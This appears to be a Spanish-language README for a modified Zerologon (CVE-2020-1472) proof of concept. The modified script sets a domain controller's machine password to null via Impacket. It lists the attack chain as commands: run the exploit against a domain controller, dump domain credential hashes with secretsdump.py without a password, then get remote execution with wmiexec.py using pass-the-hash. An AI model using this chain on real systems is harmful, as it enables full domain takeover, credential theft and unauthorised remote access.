
Modificado el PoC de prueba de Secura, CVE-2020-1472, para cambiar la contraseña de la máquina a null
Se modificó el PoC de prueba de Secura, CVE-2020-1472, para cambiar la contraseña de la máquina a nula. El cambio de contraseña en la máquina utiliza la función NetrServerPasswordSet2() de Microsoft. Este exploit se aprovecha del módulo nrpc.py de Impacket para llamar a NetrServerPasswordSet2().
./zerologon_NULLPASS.py <dc-name> <dc-ip>

secretsdump.py -no-pass <dc-name>\$@<dc-ip>

wmiexec.py -hashes <LM:NT> <username>@<ip>
